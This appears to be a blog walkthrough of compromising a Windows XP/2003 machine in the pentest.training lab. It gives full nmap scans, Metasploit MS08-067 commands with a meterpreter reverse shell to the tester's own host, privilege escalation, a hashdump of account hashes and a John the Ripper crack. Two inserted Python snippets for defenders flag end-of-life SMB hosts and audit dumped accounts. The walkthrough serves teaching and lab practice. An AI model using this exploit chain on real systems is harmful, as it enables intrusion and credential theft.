Windows XP has not been supported in years! Yet for a large part of that unsupported time a flaw has existed that allows complete control of the asset.
This XP machine is found in the labs at https://pentest.training. I strongly urge you to log in and have a poke around, especially if you're lacking the finances or knowledge to create your own lab.
So we are using OpenVPN to connect to the labs hosted at http://pentest.training. On the network is an XP box. Our mission is to hunt it down and own it. It's possibly the lowest-hanging fruit you'll find in any network, and today we will show you why.
Once in the network you'll find you're given an IP in the 10.0.100.x range. That is only your VPN tunnel, as shown in ifconfig. Go back to the OpenVPN connection window you launched:

```
Sat Jan 13 10:18:27 2018 us=654083 /sbin/ip route add 10.0.10.0/24 via 10.0.100.161
Sat Jan 13 10:18:27 2018 us=667003 /sbin/ip route add 10.0.100.1/32 via 10.0.100.161
```
See how it's setting up the routes for you: there is 10.0.10.0/24 available to you, so we should start there. Whilst we could do an nmap discovery scan for all assets, I'm only interested in XP assets, so I'm going to try to enumerate the operating systems of all machines on this subnet:

```
nmap -O 10.0.10.0/24
```

The output shows nmap's best guess at the OS of every device it scanned within the subnet. Searching through this list we find a Windows box:

```
Nmap scan report for 10.0.10.103
Host is up (0.088s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1027/tcp open  IIS
1028/tcp open  unknown
3389/tcp open  ms-wbt-server
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=1/13%OT=21%CT=1%CU=41667%PV=Y%DS=2%DC=I%G=Y%TM=5A59DF7
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10D%TI=I%CI=I%TS=0)SEQ(SP=FD
OS:%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=0)OPS(O1=M558NW0NNT00NNS%O2=M558NW
OS:0NNT00NNS%O3=M558NW0NNT00%O4=M558NW0NNT00NNS%O5=M558NW0NNT00NNS%O6=M558N
OS:NT00NNS)WIN(W1=4000%W2=4000%W3=4000%W4=4000%W5=4000%W6=4000)ECN(R=Y%DF=N
OS:%T=80%W=4000%O=M558NW0NNS%CC=N%Q=)T1(R=Y%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=N%T=80%W=4000%S=
OS:O%A=S+%F=AS%O=M558NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80
OS:%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=S%T=80%CD=Z)
```
We know this is a Windows box from the ports that are open. In a work environment it's common to see 135, 139 and 445 open for use with file-sharing protocols. IIS is another indicator that it is a Microsoft asset. Normally nmap would identify it as XP off the bat, but here we have to dig further to uncover what it is.
Enumerating a little further to confirm what's running here, we use:

```
nmap -sV 10.0.10.103
```

This gives us the "Service Version" of each open port, a more detailed output:

```
root@AttackBox:~# nmap -sV 10.0.10.103
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-13 10:34 GMT
Nmap scan report for 10.0.10.103
Host is up (0.098s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Xlight ftpd 3.8
80/tcp   open  http          Microsoft IIS httpd 6.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1027/tcp open  msrpc         Microsoft Windows RPC
1028/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds
```
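As an added example (not from the original post or the lab), here is the triage a defender would run over a normal-format nmap -sV listing like the one above: parse each host's open ports and banners, then flag any host exposing SMB on 445/tcp whose banners point at an end-of-life Windows, so unsupported assets are found before anyone else finds them. The sample scan text is constructed, modelled on the output shown, with a made-up second host added to show a non-match.

```python
import re

# Constructed sample, modelled on the nmap -sV output above, plus a made-up second host.
SAMPLE_NMAP = """\
Nmap scan report for 10.0.10.103
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Xlight ftpd 3.8
80/tcp   open  http          Microsoft IIS httpd 6.0
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.0.10.50
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH 7.4
445/tcp open  microsoft-ds Samba smbd 4.7.1
"""

# Banner fragments that identify Windows releases long out of support.
LEGACY_MARKERS = ("windows 2000", "windows xp", "windows 2003", "windows_server_2003", "iis httpd 6.0")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Map each scanned IP to its open ports {port: (service, version)} and Service Info line."""
    hosts, cur = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = hosts.setdefault(m.group(1), {"ports": {}, "info": ""})
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            cur["ports"][int(m.group(1))] = (m.group(4), m.group(5).strip())
        elif line.startswith("Service Info:"):
            cur["info"] = line[len("Service Info:"):].strip()
    return hosts

def legacy_smb_hosts(hosts):
    """Return [(ip, markers)] for hosts with 445/tcp open and an end-of-life Windows banner."""
    flagged = []
    for ip, h in hosts.items():
        if 445 not in h["ports"]:
            continue
        banners = " ".join(v for _, v in h["ports"].values()) + " " + h["info"]
        hits = sorted({mk for mk in LEGACY_MARKERS if mk in banners.lower()})
        if hits:
            flagged.append((ip, hits))
    return flagged
```

Run it over `nmap -sV -oN scan.txt` output to turn a subnet sweep into a short list of hosts that need patching or isolating first.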
Now we are pretty sure this is an XP asset (or an extremely poorly configured Windows box). Let's fire up our Metasploit console using:
Once in, we can start to build our attack stagers. We will be using the well-known exploit for MS08-067, which has left XP vulnerable and an easy target. We can search for the exploit using:
Now we can prep the attack: first setting up the payload, then configuring the exploit:

```
msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 10.0.100.162
LHOST => 10.0.100.162
msf payload(reverse_tcp) > search ms08_067
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf payload(reverse_tcp) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 10.0.10.103
RHOST => 10.0.10.103
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.0.100.162:4444
[*] 10.0.10.103:445 - Automatically detecting the target...
[*] 10.0.10.103:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 10.0.10.103:445 - We could not detect the language pack, defaulting to English
[*] 10.0.10.103:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 10.0.10.103:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.0.10.103
[*] Meterpreter session 1 opened (10.0.100.162:4444 -> 10.0.10.103:1165) at 2018-01-13 10:55:46 +0000

meterpreter >
```
Now that we have a meterpreter shell we can raise ourselves to SYSTEM with no hassle and dump the local hashes. I always run ifconfig/ipconfig on a new system to orient myself. Should the system be multi-homed, you instantly open up another avenue of attack to scan while you keep working on the local box.

```
meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name         : Realtek RTL8139 Family PCI Fast Ethernet NIC
Hardware MAC : 36:71:58:17:48:d4
MTU          : 1500
IPv4 Address : 10.0.10.103
IPv4 Netmask : 255.255.255.0

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:62eda20bfe122e1ffcff707fcab12bbb:655d1f38d5f2d9c44b2d807dccdbf8c7:::
ASPNET:1007:b3e5cccfedf674b1af941a4c244b4a37:37eb9ecbe24ce87801f3cc5ed0236e55:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2K3:1003:462782f4bea3ee6fcd93ab145a7a72ed:888efd92ee2f6df097b1c030fe137129:::
IWAM_WIN2K3:1004:756461186864d115b2e6f6d1864bce53:bdff2ae5f2a87d3fc1c754b11726f4b6:::
ned:1008:7ecf9e1d993c2b3b3180a3e4909c3aaa:9830f413f074ae2a2decf1f2193f170f:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cbdab80c3d45744ed6f1eea41c0ac9fd:::
meterpreter >
```
A pro tip about the hashes: the number between the username and the hash tells you what the account really is:
- 500 indicates the administrator account
- 501 indicates the guest account
Sometimes admins rename guest to admin in order to throw attackers down the wrong path, so keep an eye out for that!
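An added example, not from the original post, of doing the RID check above systematically: a small audit over hashdump-format lines that identifies the built-in accounts by RID rather than by name, so a renamed Guest or Administrator is caught, and also notes empty passwords and whether LM hashes are still being stored on the box (the reason John treats this dump as LM). The sample lines are constructed with placeholder hashes; the only real values are the well-known LM and NT hashes of the empty string.

```python
# Constructed sample in the hashdump/pwdump format shown above (user:RID:LM:NT:::).
# Hash values are placeholders, not real credentials; "Admin" deliberately carries
# RID 501 to reproduce the renamed-Guest trick the post warns about.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Admin:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ned:1008:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
not a hash line
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (no LM stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest"}

def parse_hashdump(text):
    """Parse user:RID:LM:NT::: lines; skip anything that does not fit the format."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows

def audit_accounts(rows):
    """Identify built-in accounts by RID (never by name) and flag weak states."""
    findings = []
    for r in rows:
        builtin = WELL_KNOWN_RIDS.get(r["rid"])
        notes = []
        if builtin and r["user"].lower() != builtin.lower():
            notes.append(f"built-in {builtin} renamed to '{r['user']}'")
        if r["nt"] == EMPTY_NT:
            notes.append("empty password")
        if r["lm"] != EMPTY_LM:
            notes.append("LM hash stored (LM hashing not disabled)")
        findings.append((r["user"], r["rid"], builtin or "local user", notes))
    return findings
```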
For the sake of shits and giggles, since we have the password hashes, let's slap them through John quickly. Paste them into a file on the desktop creatively called "hashes" and run John over it:

```
root@AttackBox:~# john --rules=ALL ~/Desktop/hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-old"
Use the "--format=NT-old" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 12 password hashes with no different salts (LM [DES 128/128 AVX-16])
Remaining 9 password hashes with no different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
SUMM3RL          (ned:1)
1g 0:00:00:32 11.91% 2/3 (ETA: 11:08:01) 0.03090g/s 743177p/s 743177c/s 6246KC/s DOORS*9..@SDFGH
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
```